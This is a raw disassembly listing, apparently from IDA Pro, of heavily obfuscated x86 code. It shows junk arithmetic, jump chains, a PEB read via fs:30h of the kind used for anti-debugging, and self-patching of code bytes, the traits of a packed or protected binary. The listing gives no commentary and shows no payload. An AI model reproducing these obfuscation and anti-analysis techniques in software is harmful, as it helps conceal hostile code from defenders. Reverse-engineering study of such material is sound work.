; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E7A
loc_439D73: ; CODE XREF: sub_459E7A:loc_44E181j
xor eax, 0AB06A5FAh
push esi
mov esi, edi
xchg esi, [esp+4+var_4]
push 52957297h
jmp loc_458D8B
; END OF FUNCTION CHUNK FOR sub_459E7A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_439D89: ; CODE XREF: sub_4503C3:loc_44B945j
jge loc_44115E
loc_439D8F: ; CODE XREF: sub_43DAFF+11j
jmp loc_459FFD
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
jbe loc_44E594
jl loc_45A911
xchg eax, [edx]
jmp loc_44115E
; ---------------------------------------------------------------------------
loc_439DA7: ; DATA XREF: sub_43AB62:loc_4507C1o
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_446913
jmp loc_439F0B
; ---------------------------------------------------------------------------
push offset sub_450F0B
jmp locret_44767F
; ---------------------------------------------------------------------------
jle loc_439025
jmp sub_43B5B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_350. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_439DD1: ; CODE XREF: ut7h7i2x:0045AA65j
jmp sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_439DD6: ; CODE XREF: sub_447EB5+B0F6j
jmp loc_442F61
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_439DDB: ; CODE XREF: sub_441765-64Fj
jmp loc_4582D9
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_439DE0: ; CODE XREF: sub_445FA9+C691j
jz loc_447D4D
and ebp, 87AE46A8h
sub ecx, 9CE78980h
add edx, 0D6101935h
jmp loc_447D4B
; END OF FUNCTION CHUNK FOR sub_445FA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_439DFD: ; CODE XREF: sub_44E2C4:loc_4454E0j
xchg edx, [esp+0]
jmp nullsub_19
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_439E05: ; CODE XREF: sub_44B68F:loc_43DCECj
mov ebp, edx
xchg ebp, [esp+4+var_4]
mov edx, eax
xchg edx, [esp+4+var_4]
jmp nullsub_222
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
loc_439E14: ; CODE XREF: ut7h7i2x:00446769j
jb loc_44C4CD
add ebp, 0F7986132h
; START OF FUNCTION CHUNK FOR sub_45A070
loc_439E20: ; CODE XREF: sub_45A070:loc_446755j
and eax, 0E949F20Eh
sub eax, ds:4000FBh
xor eax, 0EA61945Bh
call sub_441878
; END OF FUNCTION CHUNK FOR sub_45A070
; START OF FUNCTION CHUNK FOR sub_44DD39
loc_439E37: ; CODE XREF: sub_44DD39+5018j
jmp loc_43CB7A
; END OF FUNCTION CHUNK FOR sub_44DD39
; ---------------------------------------------------------------------------
loc_439E3C: ; CODE XREF: ut7h7i2x:0045091Dj
jmp loc_43C3D1
; ---------------------------------------------------------------------------
loc_439E41: ; CODE XREF: ut7h7i2x:0044708Fj
jmp sub_4589FE
; ---------------------------------------------------------------------------
loc_439E46: ; CODE XREF: ut7h7i2x:004427BBj
jmp loc_444146
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44615D
loc_439E4B: ; CODE XREF: sub_44615D+9j
jz loc_44A846
jmp loc_44A1BE
; END OF FUNCTION CHUNK FOR sub_44615D
; ---------------------------------------------------------------------------
push 0FF418B27h
jmp sub_43CB0D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_376. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439FD5
loc_439E61: ; CODE XREF: sub_439FD5+1794Aj
jmp nullsub_208
; END OF FUNCTION CHUNK FOR sub_439FD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442D06
loc_439E66: ; CODE XREF: sub_442D06+4j
jmp loc_44FE10
; END OF FUNCTION CHUNK FOR sub_442D06
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_439E6B: ; CODE XREF: sub_445AD1+6E1Dj
rol ecx, 0Ah
xor ecx, 3117523Bh
xor eax, ecx
xchg ebx, [esp+0]
mov ecx, ebx
pop ebx
ror eax, 8
jnz loc_440E7E
jmp loc_451B69
; END OF FUNCTION CHUNK FOR sub_445AD1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_204. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, 0F75CA70h
call sub_43AA94
mov ds:off_41D0D8, eax
lea eax, loc_44F5D9
call sub_449C2C
; START OF FUNCTION CHUNK FOR sub_44D2FA
loc_439EA6: ; CODE XREF: sub_44D2FA+53E0j
pop ecx
pop ebx
pop ebp
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_44D2FA
; ---------------------------------------------------------------------------
loc_439EAE: ; CODE XREF: ut7h7i2x:0044FEE7j
push ebp
mov ebp, esp
push ecx
mov ecx, ebx
xchg ecx, [esp]
jmp loc_452E2D
; ---------------------------------------------------------------------------
loc_439EBC: ; CODE XREF: ut7h7i2x:00458B65j
jle loc_456834
; START OF FUNCTION CHUNK FOR sub_455111
loc_439EC2: ; CODE XREF: sub_455111-C42j
and eax, 77B3EBA9h
; END OF FUNCTION CHUNK FOR sub_455111
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_439EC8: ; CODE XREF: sub_43AB62:loc_454510j
xor eax, 0BB595F53h
add eax, ebp
add eax, 5335C90Ah
jmp loc_450007
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_439EDB: ; CODE XREF: ut7h7i2x:00444C8Dj
jnz loc_442140
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_439EE1: ; CODE XREF: sub_43FF65+DECFj
jmp loc_43CD1F
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
jl loc_4547E9
or esi, 7A62400Bh
loc_439EF2: ; CODE XREF: ut7h7i2x:loc_4492D2j
mov ebx, [edx]
jmp loc_442140
; ---------------------------------------------------------------------------
loc_439EF9: ; CODE XREF: ut7h7i2x:0044E5BCj
sbb esi, ecx
jmp loc_457AC1
; ---------------------------------------------------------------------------
loc_439F00: ; CODE XREF: ut7h7i2x:0044F383j
jnz loc_43EB36
jmp loc_45771D
; ---------------------------------------------------------------------------
loc_439F0B: ; CODE XREF: ut7h7i2x:00439DB6j
jnz loc_458A41
jmp loc_44B950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6CC
loc_439F16: ; CODE XREF: sub_43E6CC:loc_43FF48j
sub ebx, 0BBAF66C4h
ror eax, 16h
jmp loc_43B016
; END OF FUNCTION CHUNK FOR sub_43E6CC
; ---------------------------------------------------------------------------
adc ebp, 3AF85E3Fh
jmp sub_43F66D
; ---------------------------------------------------------------------------
loc_439F2F: ; CODE XREF: ut7h7i2x:loc_445411j
push ebx
jmp loc_43FD5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_439F35: ; CODE XREF: sub_44865D:loc_440469j
jl loc_4526DF
js loc_447154
rol ebp, 1Eh
jmp loc_4526DF
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
test edx, esi
jmp loc_455F7D
; ---------------------------------------------------------------------------
loc_439F50: ; CODE XREF: ut7h7i2x:00443D36j
jbe loc_457B21
test esi, 137D136Eh
jmp loc_439851
; ---------------------------------------------------------------------------
pop ebx
jmp loc_43FA78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A070
loc_439F67: ; CODE XREF: sub_45A070-1CA66j
mov ebp, esi
add edi, esi
jmp loc_458B71
; END OF FUNCTION CHUNK FOR sub_45A070
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456E7D
loc_439F70: ; CODE XREF: sub_456E7D:loc_449C88j
rol edx, 6
add edx, 0B56374CEh
and edx, 53843A41h
xor edx, 90466CA6h
push eax
pushf
push 7CECA50h
pop eax
jmp loc_44C68D
; END OF FUNCTION CHUNK FOR sub_456E7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_439F92: ; CODE XREF: sub_43F1B2:loc_447BD5j
; sub_43F1B2+13C9Ej
mov eax, [esp+0]
call sub_4533DE
loc_439F9A: ; CODE XREF: sub_44D26E:loc_446231j
or eax, 0C0CCD07Bh
xor eax, 0C53BBF66h
add eax, 0A16E3275h
call sub_43AA94
push edx
push 7273F985h
xchg eax, [esp+8+var_8]
mov edx, eax
jmp loc_4490FF
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
mov eax, 0A5559D12h
call sub_43AA94
push offset sub_448DD9
jmp loc_43D3E0
; =============== S U B R O U T I N E =======================================
sub_439FD5 proc near ; CODE XREF: sub_44D1F0+53F6j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439E61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A680 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AED4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CEB6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450861 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451911 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00455027 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457925 SIZE 00000011 BYTES
push ebx
mov ebx, eax
xchg ebx, [esp+4+var_4]
mov edx, eax
call sub_43F058
loc_439FE2: ; CODE XREF: ut7h7i2x:00443723j
call sub_43BA59
jmp loc_43AED4
sub_439FD5 endp
; ---------------------------------------------------------------------------
loc_439FEC: ; DATA XREF: sub_44978D+6o
xchg edi, [esp]
mov edx, edi
pop edi
mov eax, [esp]
push eax
mov eax, edx
xchg eax, [esp]
jmp loc_45456D
; ---------------------------------------------------------------------------
not ebx
jmp sub_455597
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_43A007: ; CODE XREF: sub_4456F4+16j
mov eax, edx
pop edx
and eax, 0C6F8B3ABh
cmp eax, 8CC399F9h
jmp loc_450B8F
; END OF FUNCTION CHUNK FOR sub_4456F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_43A01B: ; CODE XREF: sub_45A79F-1B925j
js loc_446ACF
and edx, 36C27BF8h
jmp loc_43D254
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_43A02C: ; CODE XREF: sub_4417AF-3299j
sub al, 99h
mov edx, [ebp+var_4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43D254
jmp loc_4434F8
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
dd 71DF7582h
dword_43A044 dd 77DD0000h ; DATA XREF: sub_44C8F3-85E0w
; sub_44C8F3-85DBr ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45AC59
loc_43A048: ; CODE XREF: sub_45AC59+Dj
jmp loc_43D2E8
; END OF FUNCTION CHUNK FOR sub_45AC59
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_43A04D: ; CODE XREF: sub_44DF79-CE99j
jmp loc_43EEB5
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
dw 6A65h
dd 2C76642Ch, 6499B438h, 6CD891C5h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44697F
loc_43A061: ; CODE XREF: sub_44697F+1j
jmp loc_451014
; END OF FUNCTION CHUNK FOR sub_44697F
; ---------------------------------------------------------------------------
loc_43A066: ; CODE XREF: ut7h7i2x:0043D89Dj
jmp loc_4463EB
; ---------------------------------------------------------------------------
db 0C0h
dd 0B71DF79Eh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565F6
loc_43A070: ; CODE XREF: sub_4565F6+14j
jmp locret_4419B3
; END OF FUNCTION CHUNK FOR sub_4565F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_43A075: ; CODE XREF: sub_447EB5:loc_4498A6j
jmp loc_454D1C
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
dw 2879h
dd 0D1DF7580h, 7DD60787h ; DATA XREF: ut7h7i2x:loc_45182Aw
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448FAC
loc_43A084: ; CODE XREF: sub_448FAC+5j
jmp nullsub_483
; END OF FUNCTION CHUNK FOR sub_448FAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446599
loc_43A089: ; CODE XREF: sub_446599:loc_44EBE3j
jz loc_44895F
jmp loc_447424
; END OF FUNCTION CHUNK FOR sub_446599
; ---------------------------------------------------------------------------
loc_43A094: ; CODE XREF: ut7h7i2x:loc_443B7Bj
call sub_43AA94
mov ds:dword_41D128, eax
push offset loc_455B60
jmp locret_4426A1
; ---------------------------------------------------------------------------
loc_43A0A9: ; CODE XREF: ut7h7i2x:00454A52j
mov [ebp+0], ebx
jnb loc_44D1C4
jmp loc_43B3C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A33F
loc_43A0B7: ; CODE XREF: sub_44A33F:loc_459EA8j
jge loc_4439E1
ror edx, 2
sbb ecx, ebp
jmp loc_4439E1
; END OF FUNCTION CHUNK FOR sub_44A33F
; =============== S U B R O U T I N E =======================================
sub_43A0C7 proc near ; CODE XREF: sub_44D5BE-D586p
; ut7h7i2x:00444A9Ej
; FUNCTION CHUNK AT 00439B8C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043D948 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044048E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442961 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B5A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452275 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453BD3 SIZE 00000011 BYTES
xchg ebx, [esp+0]
pop ebx
mov edx, [edx]
or edx, edx
jnz loc_452275
jmp loc_43D948
sub_43A0C7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43A0DA proc near ; CODE XREF: ut7h7i2x:00441361p
; ut7h7i2x:0044819Dj
; FUNCTION CHUNK AT 0043F417 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448FD3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455C65 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
xor edi, 0F61BAA77h
add edi, ebp
add edi, 0FC833B64h
loc_43A0EC: ; CODE XREF: ut7h7i2x:loc_43EB30j
jmp loc_448FD3
sub_43A0DA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440493
loc_43A0F1: ; CODE XREF: sub_440493:loc_443493j
push offset sub_459FAF
jmp loc_4487E8
; END OF FUNCTION CHUNK FOR sub_440493
; ---------------------------------------------------------------------------
loc_43A0FB: ; CODE XREF: ut7h7i2x:0044BEE5j
cmp edx, ebp
jmp loc_4583BE
; ---------------------------------------------------------------------------
push 0FBAF129Eh
pop edx
xor edx, 0EE2E6EBCh
rol edx, 19h
xor edx, 4B5EC888h
call sub_44ED9F
push eax
jmp loc_45254E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43A122: ; CODE XREF: sub_43DBEC+1BD6Aj
xchg edi, [esp+0]
mov edx, edi
pop edi
and edx, 1D1CF0F6h
add edx, 224934C1h
jmp loc_447094
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_43A139: ; CODE XREF: ut7h7i2x:loc_4504C2j
sub ebx, 6DCCB6D4h
add ebx, ds:4000F0h
sub ebx, 0ED99C6E0h
test ebx, 200000h
jmp loc_4590AB
; ---------------------------------------------------------------------------
loc_43A156: ; CODE XREF: ut7h7i2x:00443B86j
jns loc_45689D
xor eax, edi
jmp loc_43D729
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_493. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_43A164: ; CODE XREF: sub_4471CA-5463j
jmp loc_451A52
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_43A169: ; CODE XREF: sub_44E5AB-11B0Dj
jge loc_439C35
; END OF FUNCTION CHUNK FOR sub_44E5AB
; START OF FUNCTION CHUNK FOR sub_44D759
loc_43A16F: ; CODE XREF: sub_44D759+13j
jmp loc_444ACC
; END OF FUNCTION CHUNK FOR sub_44D759
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_43A174: ; CODE XREF: sub_43AE1A+B101j
jmp loc_4401AD
; END OF FUNCTION CHUNK FOR sub_43AE1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_43A179: ; CODE XREF: sub_43A556+5E8Fj
jmp nullsub_58
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
adc esi, ecx
xor edi, eax
jmp loc_439C35
; ---------------------------------------------------------------------------
loc_43A187: ; CODE XREF: ut7h7i2x:loc_447299j
mov ebx, edx
xchg ebx, [esp]
push eax
call sub_444BAE
loc_43A192: ; CODE XREF: ut7h7i2x:00453679j
jmp loc_456AAE
; ---------------------------------------------------------------------------
loc_43A197: ; CODE XREF: ut7h7i2x:00446458j
jmp loc_43ACEE
; ---------------------------------------------------------------------------
mov eax, 3E69A3C2h
call sub_43AED9
mov ds:off_41D014, eax
lea eax, loc_455640
mov byte ptr [eax], 0C3h
jmp loc_455640
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_356. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43A1BB: ; CODE XREF: ut7h7i2x:00443C10j
jmp loc_453848
; ---------------------------------------------------------------------------
call sub_453D8B
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43A1C5: ; CODE XREF: sub_439BF8+8B00j
push 6254B4C3h
xchg eax, [esp+0]
mov edx, eax
pop eax
and edx, 0B24B7066h
jmp loc_452426
; END OF FUNCTION CHUNK FOR sub_439BF8
; =============== S U B R O U T I N E =======================================
sub_43A1DB proc near ; CODE XREF: ut7h7i2x:0043AE86p
; ut7h7i2x:0043B88Fj
xchg edi, [esp+0]
pop edi
call sub_4448AF
jmp loc_452117
sub_43A1DB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp loc_45A302
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_43A1EE: ; CODE XREF: sub_43EF73:loc_458413j
mov eax, large fs:30h
push edx
push 0E7B9617Dh
jmp loc_44EE3D
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449217
loc_43A200: ; CODE XREF: sub_449217-3041j
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_44774B
mov edx, [ebx+ecx]
xor edx, [ebx+ecx+4]
jmp loc_4454E5
; END OF FUNCTION CHUNK FOR sub_449217
; =============== S U B R O U T I N E =======================================
sub_43A218 proc near ; DATA XREF: sub_43DBEC:loc_453F69o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043C077 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C0C1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044341B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004479E1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449D11 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00449F96 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AFF8 SIZE 00000005 BYTES
push edi
mov edi, esi
xchg edi, [esp+4+var_4]
mov esi, eax
xchg esi, [esp+4+var_4]
mov edx, eax
call sub_43F058
jmp loc_43C0C1
sub_43A218 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_43A22F: ; CODE XREF: sub_43F0B0-C12j
jz loc_43FAB4
jmp loc_43CE0C
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
loc_43A23A: ; CODE XREF: ut7h7i2x:0044160Fj
jnp sub_4516C6
; =============== S U B R O U T I N E =======================================
sub_43A240 proc near ; CODE XREF: ut7h7i2x:loc_4493CBp
arg_18 = dword ptr 1Ch
; FUNCTION CHUNK AT 0044E683 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453C8D SIZE 00000012 BYTES
xchg edi, [esp+0]
pop edi
popf
adc ecx, eax
jmp loc_44E683
sub_43A240 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43A24C: ; CODE XREF: ut7h7i2x:00440430j
mov [ecx], edx
; START OF FUNCTION CHUNK FOR sub_452361
loc_43A24E: ; CODE XREF: sub_452361:loc_44041Fj
xor ecx, 971B8AFFh
or ecx, 0F03FB16Ch
sub ecx, 592D821Ah
jmp loc_43C8C4
; END OF FUNCTION CHUNK FOR sub_452361
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444D26
loc_43A265: ; CODE XREF: sub_444D26:loc_4400EEj
or ebx, 0B2B8DE22h
rol ebx, 0Dh
or ebx, 0AA4E93BEh
test ebx, 80000000h
jmp loc_43D18E
; END OF FUNCTION CHUNK FOR sub_444D26
; =============== S U B R O U T I N E =======================================
sub_43A27F proc near ; DATA XREF: sub_4490E0:loc_43AB1Co
; FUNCTION CHUNK AT 004515FC SIZE 00000005 BYTES
add esi, 6C5BA44Ah
loc_43A285: ; CODE XREF: ut7h7i2x:loc_455902j
xchg esi, [esp+0]
jmp loc_4515FC
sub_43A27F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_43A28D: ; CODE XREF: sub_43CAF4+1DFBCj
js loc_4443D3
js loc_4530F4
loc_43A299: ; CODE XREF: sub_43CAF4:loc_457F60j
mov eax, [esp+0]
call sub_4594B7
jmp loc_459125
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
loc_43A2A6: ; CODE XREF: ut7h7i2x:loc_457326j
jz loc_452CCC
jmp loc_452A5F
; ---------------------------------------------------------------------------
loc_43A2B1: ; CODE XREF: ut7h7i2x:0043B202j
sub edi, 8ABEC89Ch
sub ebx, eax
loc_43A2B9: ; CODE XREF: ut7h7i2x:loc_455CEEj
cmp dword ptr [ebp-108h], 31342D37h
jnz loc_43F01A
jmp loc_43D0A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_43A2CE: ; CODE XREF: sub_4463D6:loc_43EFAFj
push 0A542C044h
pop eax
and eax, 9F4AAA29h
add eax, 7B016C47h
xchg eax, [esp+4+var_4]
jmp loc_43EC52
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_43A2E8: ; CODE XREF: sub_44064B:loc_43E348j
or eax, 8
push offset loc_4581D3
jmp loc_43F2FB
; END OF FUNCTION CHUNK FOR sub_44064B
; =============== S U B R O U T I N E =======================================
sub_43A2F5 proc near ; CODE XREF: ut7h7i2x:00442792j
; ut7h7i2x:00445711p
; FUNCTION CHUNK AT 0043D8C2 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045348F SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
push ebx
mov ebx, eax
jmp loc_45348F
sub_43A2F5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43A301 proc near
mov ds:off_41D16C, eax
lea eax, sub_45002D
mov byte ptr [eax], 0C3h
jmp loc_458FED
sub_43A301 endp
; ---------------------------------------------------------------------------
push esi
push offset loc_43BC69
jmp loc_4429CD
; ---------------------------------------------------------------------------
push 0FFFFFFFFh
call sub_454ABB
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D683
loc_43A32B: ; CODE XREF: sub_44D683+D5D1j
jmp nullsub_470
; END OF FUNCTION CHUNK FOR sub_44D683
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459DE7
loc_43A330: ; CODE XREF: sub_459DE7+6j
jmp loc_4469A2
; END OF FUNCTION CHUNK FOR sub_459DE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4395FB
loc_43A335: ; CODE XREF: sub_4395FB+8j
jmp loc_4417DB
; END OF FUNCTION CHUNK FOR sub_4395FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C595
loc_43A33A: ; CODE XREF: sub_44C595:loc_44A074j
jz loc_445F55
; END OF FUNCTION CHUNK FOR sub_44C595
; START OF FUNCTION CHUNK FOR sub_442AD1
loc_43A340: ; CODE XREF: sub_442AD1+1j
jmp loc_45367E
; END OF FUNCTION CHUNK FOR sub_442AD1
; ---------------------------------------------------------------------------
sbb eax, 819574E5h
adc eax, 5A1E1061h
adc ecx, 0BDD1F40Ah
jmp loc_459F92
; ---------------------------------------------------------------------------
loc_43A35C: ; DATA XREF: ut7h7i2x:00458624o
mov byte ptr [eax], 0
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7B6
loc_43A363: ; CODE XREF: sub_43F7B6+4j
mov eax, [ebp-4]
jmp loc_44847C
; END OF FUNCTION CHUNK FOR sub_43F7B6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_43A36B: ; CODE XREF: sub_43A513+17176j
mov eax, [ebp-20h]
call sub_458362
pop ecx
mov [ebp-20h], eax
jmp loc_452185
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
and ecx, 0EE863ACAh
jmp sub_44022F
; ---------------------------------------------------------------------------
locret_43A387: ; CODE XREF: ut7h7i2x:0043AC02j
retn
; ---------------------------------------------------------------------------
loc_43A388: ; CODE XREF: ut7h7i2x:00440A0Ej
mov esi, 4DA76367h
sub edi, 749C507Dh
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_43A393: ; CODE XREF: sub_445AD1:loc_4409FEj
or ecx, 8FD24B67h
xor ecx, 819B08B2h
push offset loc_43D591
jmp nullsub_199
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
loc_43A3A9: ; CODE XREF: ut7h7i2x:00445B84j
push edx
sbb edi, 63AED6D3h
adc eax, ecx
shl eax, 16h
jmp loc_4415D4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_223. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_43A3BB: ; CODE XREF: sub_4462B0+F51j
jl loc_4564C3
loc_43A3C1: ; CODE XREF: ut7h7i2x:0045697Dj
jmp nullsub_481
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
loc_43A3C6: ; CODE XREF: ut7h7i2x:004495EAj
jmp loc_446BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_43A3CB: ; CODE XREF: sub_43FF65+5D7Fj
jmp nullsub_170
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44765F
loc_43A3D0: ; CODE XREF: sub_44765F-49D4j
jmp sub_4448AF
; END OF FUNCTION CHUNK FOR sub_44765F
; ---------------------------------------------------------------------------
add ecx, esi
jmp loc_445316
; ---------------------------------------------------------------------------
loc_43A3DC: ; DATA XREF: ut7h7i2x:loc_457912o
push eax
mov eax, edx
xchg eax, [esp]
push esi
; START OF FUNCTION CHUNK FOR sub_456E7D
loc_43A3E3: ; CODE XREF: sub_456E7D:loc_43F7EBj
push 0ECEECA08h
pop esi
jmp loc_450151
; END OF FUNCTION CHUNK FOR sub_456E7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_43A3EE: ; CODE XREF: sub_452B14-13D75j
add edx, 9EFC4778h
jns loc_4485DE
loc_43A3FA: ; CODE XREF: ut7h7i2x:004442A8j
; ut7h7i2x:004525BEj
jmp loc_442379
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
test eax, 7EF6E4E7h
jmp loc_440BF9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455597
loc_43A40A: ; CODE XREF: sub_455597+17j
push edx
push 71B7542Dh
pop edx
and edx, 723E873Dh
sub edx, ds:4000F0h
or edx, 66CACE08h
test edx, 2000h
jmp loc_444E81
; END OF FUNCTION CHUNK FOR sub_455597
; ---------------------------------------------------------------------------
loc_43A42E: ; CODE XREF: ut7h7i2x:0044CD26j
rol eax, 18h
add edx, ebp
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_43A433: ; CODE XREF: sub_4459EE:loc_44CD0Dj
